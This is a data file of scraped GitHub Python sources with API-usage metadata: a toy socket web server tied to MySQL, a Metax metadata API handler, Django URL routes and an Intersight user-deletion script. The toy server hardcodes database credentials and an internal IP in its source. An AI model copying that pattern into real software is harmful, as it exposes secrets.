"os.rmdir", "line_number": 446, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 451, "usage_type": "call"}, {"api_name": "os.path", "line_number": 451, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 456, "usage_type": "call"}, {"api_name": "os.path", "line_number": 456, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 457, "usage_type": "call"}, {"api_name": "os.path", "line_number": 457, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 458, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 459, "usage_type": "call"}, {"api_name": "os.path", "line_number": 459, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 477, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 481, "usage_type": "call"}, {"api_name": "time.time", "line_number": 486, "usage_type": "call"}, {"api_name": "time.time", "line_number": 490, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 492, "usage_type": "call"}, {"api_name": "os.path", "line_number": 492, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 494, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 497, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 500, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path", "line_number": 504, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 519, "usage_type": "call"}, {"api_name": "time.time", "line_number": 528, "usage_type": "call"}, {"api_name": "grid2viz.src.kpi.EpisodeAnalytics.EpisodeAnalytics", "line_number": 530, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 536, "usage_type": "call"}, {"api_name": "os.path", "line_number": 536, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 537, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 545, "usage_type": "call"}, {"api_name": "os.path", "line_number": 545, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 546, "usage_type": "call"}, {"api_name": "os.path", "line_number": 546, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 546, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 547, "usage_type": "call"}, {"api_name": "os.path", "line_number": 547, "usage_type": "attribute"}, {"api_name": "grid2op.Episode.EpisodeData.from_disk", "line_number": 548, "usage_type": "call"}, {"api_name": "grid2op.Episode.EpisodeData", "line_number": 548, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 580, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 580, "usage_type": "call"}, {"api_name": "os.path", "line_number": 580, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 582, "usage_type": "call"}, {"api_name": "os.path", "line_number": 582, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 583, "usage_type": "call"}, {"api_name": "os.path", "line_number": 583, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 585, "usage_type": "call"}, {"api_name": "os.path", "line_number": 585, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 586, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 623, "usage_type": "call"}, {"api_name": "os.path", "line_number": 623, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 624, "usage_type": "call"}, {"api_name": "os.path", "line_number": 624, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 626, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 637, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 638, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 646, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 660, "usage_type": "call"}, {"api_name": "os.path", "line_number": 660, "usage_type": "attribute"}, {"api_name": "pathos.multiprocessing.ProcessPool", "line_number": 678, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 695, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 697, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 698, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 699, "usage_type": "call"}, {"api_name": "os.path", "line_number": 699, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 699, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 701, "usage_type": "call"}, {"api_name": "os.path", "line_number": 701, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 701, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 703, "usage_type": "call"}, {"api_name": "colorama.Fore.BLUE", "line_number": 705, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 705, "usage_type": "name"}, {"api_name": "colorama.Style.BRIGHT", "line_number": 705, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 705, "usage_type": "name"}, {"api_name": "colorama.Fore.BLUE", "line_number": 710, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 710, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 711, "usage_type": "call"}, {"api_name": "os.path", "line_number": 711, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 716, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 717, "usage_type": "call"}, {"api_name": "os.path", "line_number": 717, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 717, "usage_type": "call"}, {"api_name": "configparser.NoOptionError", "line_number": 729, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 733, "usage_type": "call"}, {"api_name": "os.path", "line_number": 733, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 736, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 737, "usage_type": "call"}, {"api_name": "os.path", "line_number": 737, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 737, "usage_type": "call"}, {"api_name": "pathlib.Path.home", "line_number": 750, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 750, "usage_type": "name"}]} +{"seq_id": "6064377675", "text": "\"\"\"\nhttp协议 --> 应用层协议\n浏览器会默认的加上80端口号\n\n# 1. 识别不同的网址 --> 返回不同的页面\n# 2. 能够加载外部的html文件进来\n# 3. 服务器去链接数据库\n# 4. 注册功能 --> 插入一条数据到mysql中\n# 5. 登陆功能 --> 在数据库中查询 在注册的时候插入的账户密码是否匹配\n# 6. 保持登陆 --> cookie 或者 session\n\"\"\"\nimport socket\nimport pymysql\n#tcp和ip协议\nclass WebServer:\n def __init__(self):\n self.ss = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n #重启的时候 不用去改端口号\n self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n #绑定ip地址和端口号\n self.ss.bind(('10.2.0.26',10081))\n self.ss.listen(10)\n\n\n def run(self):\n conn,addr = self.ss.accept()\n msg = conn.recv(1024)\n url = self.get_url(msg)\n res = self.url_header(url)\n response_header = \"HTTP/1.1 200 OK\\r\\nContent-Type: text/html\\r\\n\" \\\n \"Connection: Closed\\r\\n\\r\\n\"\n\n with open(res,'r') as f:\n response_body = f.read()\n conn.send((response_header+response_body).encode())\n\n mysql_conn = self.mysql_conn()\n\n cursor = mysql_conn.cursor()\n\n sql ='select * from user'\n cursor.execute(sql)\n\n res = mysql_conn.commit()\n\n print(res)\n\n\n\n def url_header(self,url):\n if url == b'/':\n return 'test2.html'\n if url == b'/p1904':\n return 'tset.html'\n\n return '404.html'\n def get_url(self,msg):\n msg_list = msg.split()\n return msg_list[1]\n\n def mysql_conn(self):\n conn = pymysql.connect(\n host='10.2.0.26',\n user ='p1904', password ='p1904_123',\n database ='my_web',\n charset ='utf8')\n\n return conn\n\n\n\nif __name__ == '__main__':\n s = WebServer()\n s.run()\n", "repo_name": "JwangTec/python_resources", "sub_path": "django/web_server.py", "file_name": "web_server.py", "file_ext": "py", "file_size_in_byte": 1905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "socket.socket", "line_number": 17, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 17, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 17, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 19, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pymysql.connect", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "33461524602", "text": "\"\"\"Class for handling calls to METAX API.\n\nAPI docs https://metax.fairdata.fi/docs/\nSwagger https://metax.fairdata.fi/swagger/v2\n\"\"\"\nimport time\nfrom typing import Any\n\nfrom aiohttp import BasicAuth, web\nfrom aiohttp.client_exceptions import ClientConnectorError, InvalidURL\nfrom yarl import URL\n\nfrom ..conf.conf import metax_config\nfrom ..helpers.logger import LOG\nfrom .metax_mapper import MetaDataMapper, SubjectNotFoundException\nfrom .service_handler import ServiceHandler\n\n\nclass MetaxServiceHandler(ServiceHandler):\n \"\"\"API handler for uploading submitters' metadata to METAX service.\"\"\"\n\n service_name = \"Metax\"\n\n def __init__(self) -> None:\n \"\"\"Define variables and paths.\n\n Define variables and paths used for connecting to Metax API and\n default inputs for Metax Dataset creation.\n\n :param req: HTTP request from calling service\n \"\"\"\n metax_url = URL(metax_config[\"url\"])\n super().__init__(\n base_url=metax_url / metax_config[\"rest_route\"][1:],\n auth=BasicAuth(metax_config[\"username\"], metax_config[\"password\"]),\n )\n\n self.connection_check_url = metax_url\n self.publish_route = metax_url / metax_config[\"publish_route\"][1:]\n\n self.minimal_dataset_template: dict[Any, Any] = {\n \"data_catalog\": metax_config[\"catalog_pid\"],\n \"metadata_provider_org\": \"csc.fi\",\n \"research_dataset\": {\n # submitter given DOI\n \"preferred_identifier\": \"\",\n \"title\": {\"en\": \"\"},\n # study abstract or dataset description\n \"description\": {\"en\": \"\"},\n # default\n \"access_rights\": {\n \"access_type\": {\n \"in_scheme\": \"http://uri.suomi.fi/codelist/fairdata/access_type\",\n \"identifier\": \"http://uri.suomi.fi/codelist/fairdata/access_type/code/restricted\",\n }\n },\n # default\n \"publisher\": {\n \"name\": {\n \"en\": \"CSC Sensitive Data Services for Research\",\n \"fi\": \"CSC:n Arkaluonteisen datan palveluiden aineistokatalogi\",\n },\n \"@type\": \"Organization\",\n },\n },\n }\n\n async def _get(self, metax_id: str) -> dict[str, Any]:\n result: dict[str, Any] = await self._request(method=\"GET\", path=metax_id)\n LOG.info(\"Got metax dataset with ID: %r.\", metax_id)\n\n return result\n\n async def _post_draft(self, json_data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Post call to Metax REST API.\n\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"POST\", json_data=json_data, params=\"draft\")\n LOG.info(\"Created Metax draft dataset with ID: %r.\", result[\"identifier\"])\n\n return result\n\n async def _put(self, metax_id: str, json_data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Put call to Metax REST API.\n\n :param metax_id: ID of dataset to be updated\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"PUT\", path=metax_id, json_data=json_data)\n LOG.info(\"Metax dataset with ID: %r updated.\", metax_id)\n\n return result\n\n async def _patch(self, metax_id: str, json_data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Patch call to Metax REST API.\n\n :param metax_id: ID of dataset to be updated\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"PATCH\", path=metax_id, json_data=json_data)\n LOG.info(\"Patch completed for metax dataset with ID: %r.\", metax_id)\n\n return result\n\n async def _bulk_patch(self, json_data: list[dict[str, Any]]) -> dict[str, Any]:\n \"\"\"Bulk patch call to Metax REST API.\n\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"PATCH\", json_data=json_data)\n LOG.info(\"Bulk patch completed for metax datasets\")\n\n return result\n\n # async def _delete_draft(self, metax_id: str) -> None:\n # \"\"\"Delete draft dataset from Metax service.\n #\n # :param metax_id: Identification string pointing to Metax dataset to be deleted\n # \"\"\"\n # await self._request(method=\"DELETE\", path=metax_id)\n # LOG.debug(\"Deleted draft dataset metax ID: %r from Metax service\", metax_id)\n\n async def _publish(self, metax_id: str) -> str:\n \"\"\"Post a call to Metax RPC publish endpoint.\n\n :param metax_id: ID of dataset to be updated\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(\n method=\"POST\", url=self.publish_route, params={\"identifier\": metax_id}\n )\n LOG.info(\"Metax ID %s was published to Metax service.\", metax_id)\n\n dataset: str = result[\"preferred_identifier\"]\n return dataset\n\n async def post_dataset_as_draft(self, external_id: str, collection: str, data: dict[str, Any]) -> str:\n \"\"\"Send draft dataset to Metax.\n\n Construct Metax dataset data from submitters' Study or Dataset and\n send it as new draft dataset to Metax Dataset API.\n\n :param external_id: external user id, from OIDC provider\n :param collection: Schema of incoming submitters' metadata\n :param data: Validated Study or Dataset data dict\n :raises: HTTPError depending on returned error from Metax\n :returns: Metax ID for dataset returned by Metax API\n \"\"\"\n LOG.debug(\n \"Creating draft dataset to Metax service from collection: %r with accession ID: %r.\",\n collection,\n {data[\"accessionId\"]},\n )\n await self.check_connection()\n metax_dataset = self.minimal_dataset_template\n metax_dataset[\"metadata_provider_user\"] = external_id\n if collection == \"dataset\":\n dataset_data = self.create_metax_dataset_data_from_dataset(data)\n else:\n dataset_data = self.create_metax_dataset_data_from_study(data)\n metax_dataset[\"research_dataset\"] = dataset_data\n\n metax_data = await self._post_draft(metax_dataset)\n LOG.debug(\n \"Created Metax draft dataset for: %r with accession ID: %r with data: %r.\",\n collection,\n data[\"accessionId\"],\n metax_data,\n )\n metax_id: str = metax_data[\"identifier\"]\n # Metax service overwrites preferred id (DOI) with temporary id for draft datasets\n # Patching dataset with full research_dataset data updates preferred id to the real one\n LOG.debug(\"Updating Metax draft dataset with ID: %r with permanent preferred identifier.\", metax_id)\n await self._patch(metax_id, {\"research_dataset\": dataset_data})\n return metax_id\n\n # async def update_draft_dataset(self, external_id: str, collection: str, data: Dict) -> None:\n # \"\"\"Update draft dataset to Metax.\n #\n # Construct Metax draft dataset data from submitters' Study or Dataset and\n # send it to Metax Dataset API for update.\n #\n # :param external_id: external user id, from OIDC provider\n # :param collection: Schema of incoming submitters' metadata\n # :param data: Validated Study or Dataset data dict\n # :raises: HTTPError depending on returned error from Metax\n # \"\"\"\n # LOG.info(\"Updating collection: %r object data to Metax service.\", collection)\n # await self.check_connection()\n # metax_dataset = self.minimal_dataset_template\n # metax_dataset[\"metadata_provider_user\"] = external_id\n # if collection == \"dataset\":\n # dataset_data = self.create_metax_dataset_data_from_dataset(data)\n # else:\n # dataset_data = self.create_metax_dataset_data_from_study(data)\n # metax_dataset[\"research_dataset\"] = dataset_data\n #\n # metax_data = await self._put(data[\"metaxIdentifier\"], metax_dataset)\n # LOG.debug(\"Updated metax ID: %r, new metadata is: %r\", data[\"metaxIdentifier\"], metax_data)\n #\n # async def delete_draft_dataset(self, metax_id: str) -> None:\n # \"\"\"Delete draft dataset from Metax service.\n #\n # :param metax_id: Identification string pointing to Metax dataset to be deleted\n # \"\"\"\n # LOG.info(\"Deleting Metax draft dataset metax ID: %r\", metax_id)\n # await self._delete_draft(metax_id)\n\n async def update_dataset_with_doi_info(\n self, datacite_info: dict[str, Any], metax_ids: list[dict[str, Any]]\n ) -> None:\n \"\"\"Update dataset for publishing.\n\n :param datacite_info: Dict containing info to complete metax dataset metadata\n :param metax_ids: List of Metax id of dataset to be updated\n :raises: HTTPBadRequest if mapping datacite info to metax fails\n \"\"\"\n LOG.info(\n \"Updating metadata with datacite info for Metax datasets: %r\",\n \",\".join([id[\"metaxIdentifier\"] for id in metax_ids]),\n )\n bulk_data = []\n for metax_id in metax_ids:\n metax_data: dict[str, Any] = await self._get(metax_id[\"metaxIdentifier\"])\n\n # Map fields from doi info to Metax schema\n mapper = MetaDataMapper(metax_id[\"schema\"], metax_data[\"research_dataset\"], datacite_info)\n try:\n mapped_metax_data = mapper.map_metadata()\n except SubjectNotFoundException as error:\n # in case the datacite subject cannot be mapped to metax field of science\n reason = f\"{error}\"\n LOG.exception(reason)\n raise web.HTTPBadRequest(reason=reason)\n\n bulk_data.append({\"identifier\": metax_id[\"metaxIdentifier\"], \"research_dataset\": mapped_metax_data})\n\n await self._bulk_patch(bulk_data)\n\n async def update_draft_dataset_description(self, metax_id: str, description: str) -> None:\n \"\"\"Update the description of the draft dataset.\n\n :param metax_id: metax dataset id\n :param description: New description\n :raises: HTTPError depending on returned error from Metax\n \"\"\"\n LOG.info(\"Updating the description of Metax ID: %r.\", metax_id)\n data = await self._get(metax_id)\n data[\"research_dataset\"][\"description\"][\"en\"] = description\n metax_data = await self._put(metax_id, data)\n LOG.debug(\"Updated description of Metax ID: %r, new metadata is: %r\", metax_id, metax_data)\n\n async def publish_dataset(self, metax_ids: list[dict[str, Any]]) -> None:\n \"\"\"Publish draft dataset to Metax service.\n\n Iterate over the metax ids that need to be published.\n\n :param metax_ids: List of metax IDs that include study and datasets\n \"\"\"\n LOG.info(\"Publishing Metax datasets: %s\", \",\".join([id[\"metaxIdentifier\"] for id in metax_ids]))\n\n for obj in metax_ids:\n metax_id = obj[\"metaxIdentifier\"]\n doi = obj[\"doi\"]\n preferred_id = await self._publish(metax_id)\n\n if doi != preferred_id:\n LOG.warning(\"Metax Preferred Identifier: %r does not match object's DOI: %r.\", preferred_id, doi)\n LOG.debug(\n \"Object with Metax ID: %r and DOI: %r is published to Metax service.\",\n obj[\"metaxIdentifier\"],\n obj[\"doi\"],\n )\n\n def create_metax_dataset_data_from_study(self, data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Construct Metax dataset's research dataset dictionary from Submitters Study.\n\n :param data: Study data\n :returns: Constructed research dataset\n \"\"\"\n research_dataset: dict[str, Any] = self.minimal_dataset_template[\"research_dataset\"]\n research_dataset[\"preferred_identifier\"] = data[\"doi\"]\n research_dataset[\"title\"][\"en\"] = data[\"descriptor\"][\"studyTitle\"]\n research_dataset[\"description\"][\"en\"] = data[\"descriptor\"][\"studyAbstract\"]\n LOG.debug(\"Created Metax dataset from Study with data: %r\", research_dataset)\n return research_dataset\n\n def create_metax_dataset_data_from_dataset(self, data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Construct Metax dataset's research dataset dictionary from Submitters Dataset.\n\n :param data: Dataset data\n :returns: constructed research dataset\n \"\"\"\n research_dataset: dict[str, Any] = self.minimal_dataset_template[\"research_dataset\"]\n research_dataset[\"preferred_identifier\"] = data[\"doi\"]\n research_dataset[\"title\"][\"en\"] = data[\"title\"]\n research_dataset[\"description\"][\"en\"] = data[\"description\"]\n LOG.debug(\"Created Metax dataset from Dataset with data: %r\", research_dataset)\n return research_dataset\n\n async def _healtcheck(self) -> dict[str, str]:\n \"\"\"Check Metax service health.\n\n This responds with pong, when pinged.\n\n :returns: Dict with status of the datacite status\n \"\"\"\n try:\n start = time.time()\n async with self._client.request(\n method=\"GET\",\n url=f\"{URL(metax_config['url'])}/watchman/ping/\",\n timeout=10,\n ) as response:\n LOG.debug(\"Metax REST API status is: %s.\", response.status)\n content = await response.text()\n if response.status == 200 and content == \"pong\":\n status = \"Ok\" if (time.time() - start) < 1000 else \"Degraded\"\n else:\n status = \"Down\"\n\n return {\"status\": status}\n except ClientConnectorError as e:\n LOG.exception(\"Metax REST API is down with error: %r.\", e)\n return {\"status\": \"Down\"}\n except InvalidURL as e:\n LOG.exception(\"Metax REST API status retrieval failed with: %r.\", e)\n return {\"status\": \"Error\"}\n except web.HTTPError as e:\n LOG.exception(\"Metax REST API status retrieval failed with: %r.\", e)\n return {\"status\": \"Error\"}\n", "repo_name": "CSCfi/metadata-submitter", "sub_path": "metadata_backend/services/metax_service_handler.py", "file_name": "metax_service_handler.py", "file_ext": "py", "file_size_in_byte": 14440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "service_handler.ServiceHandler", "line_number": 19, "usage_type": "name"}, {"api_name": "yarl.URL", "line_number": 32, "usage_type": "call"}, {"api_name": "conf.conf.metax_config", "line_number": 32, "usage_type": "name"}, {"api_name": "conf.conf.metax_config", "line_number": 34, "usage_type": "name"}, {"api_name": "aiohttp.BasicAuth", "line_number": 35, "usage_type": "call"}, {"api_name": "conf.conf.metax_config", "line_number": 35, "usage_type": "name"}, {"api_name": "conf.conf.metax_config", "line_number": 39, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 41, "usage_type": "name"}, {"api_name": "conf.conf.metax_config", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 69, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 70, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 80, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 81, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 81, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 85, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 92, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 93, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 93, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 104, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 105, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 105, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 115, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 116, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 134, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 137, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 137, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 142, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 154, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 154, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 169, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 169, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 178, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 178, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 215, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 223, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 223, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 229, "usage_type": "name"}, {"api_name": "metax_mapper.MetaDataMapper", "line_number": 232, "usage_type": "call"}, {"api_name": "metax_mapper.SubjectNotFoundException", "line_number": 235, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 238, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 238, "usage_type": "name"}, {"api_name": "aiohttp.web.HTTPBadRequest", "line_number": 239, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 239, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 252, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 252, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 256, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 256, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 258, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 265, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 265, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.warning", "line_number": 273, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 273, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 274, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 280, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 286, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 290, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 290, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 293, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 299, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 303, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 303, "usage_type": "name"}, {"api_name": "time.time", "line_number": 314, "usage_type": "call"}, {"api_name": "yarl.URL", "line_number": 317, "usage_type": "call"}, {"api_name": "conf.conf.metax_config", "line_number": 317, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 320, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 320, "usage_type": "name"}, {"api_name": "time.time", "line_number": 323, "usage_type": "call"}, {"api_name": "aiohttp.client_exceptions.ClientConnectorError", "line_number": 328, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 329, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 329, "usage_type": "name"}, {"api_name": "aiohttp.client_exceptions.InvalidURL", "line_number": 331, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 332, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 332, "usage_type": "name"}, {"api_name": "aiohttp.web.HTTPError", "line_number": 334, "usage_type": "attribute"}, {"api_name": "aiohttp.web", "line_number": 334, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 335, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 335, "usage_type": "name"}]} +{"seq_id": "73963340327", "text": "from django.contrib.auth.views import LogoutView\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.dashboard, name='homepage'),\n path('id/', views.dashboard_id, name='homepage_id'),\n path('login/', views.login_page, name='login'),\n path(\"logout/\", LogoutView.as_view(template_name='login.html'), name=\"logout\"),\n path('register/', views.register_page, name='register'),\n path('activate/', views.activate, name='activate'),\n]", "repo_name": "tomyhrdnsyh/Website-Gym-Member-Register", "sub_path": "dashboard/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "20974563468", "text": "#!/usr/bin/env python\n\"\"\"Delete an Intersight user by Cisco.com ID via the Intersight API.\"\"\"\nimport sys\nimport json\nimport argparse\nfrom intersight.intersight_api_client import IntersightApiClient\nfrom intersight.apis import iam_user_api\n\n\ndef delete_user(intersight_api_params, user_email):\n# Create Intersight API instance\n # ----------------------\n api_instance = IntersightApiClient(\n host=intersight_api_params['api_base_uri'],\n private_key=intersight_api_params['api_private_key_file'],\n api_key_id=intersight_api_params['api_key_id'],\n )\n\n try:\n # GET Users\n users_handle = iam_user_api.IamUserApi(api_instance)\n kwargs = dict(filter=\"Email eq '%s'\" % user_email)\n users_result = users_handle.iam_users_get(**kwargs)\n if users_result.results:\n # DELETE Users\n users_delete_result = users_handle.iam_users_moid_delete(moid=users_result.results[0].moid)\n else:\n print(\"User not found:\", user_email)\n\n except Exception as err:\n print(\"Exception:\", str(err))\n import traceback\n print('-' * 60)\n traceback.print_exc(file=sys.stdout)\n print('-' * 60)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--id', required=True, help='Cisco email ID of the user to delete')\n help_str = 'JSON file with Intersight API parameters. Default: intersight_api_params.json'\n parser.add_argument('-a', '--api_params', default='intersight_api_params.json', help=help_str)\n args = parser.parse_args()\n with open(args.api_params, 'r') as api_file:\n intersight_api_params = json.load(api_file)\n\n delete_user(intersight_api_params, args.id)\n\n sys.exit(0)\n", "repo_name": "CiscoUcs/intersight-python", "sub_path": "examples/delete_user.py", "file_name": "delete_user.py", "file_ext": "py", "file_size_in_byte": 1758, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "53", "api": [{"api_name": "intersight.intersight_api_client.IntersightApiClient", "line_number": 13, "usage_type": "call"}, {"api_name": "intersight.apis.iam_user_api.IamUserApi", "line_number": 21, "usage_type": "call"}, {"api_name": "intersight.apis.iam_user_api", "line_number": 21, "usage_type": "name"}, {"api_name": "traceback.print_exc", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 34, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 39, "usage_type": "call"}, {"api_name": "json.load", "line_number": 45, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 49, "usage_type": "call"}]} +{"seq_id": 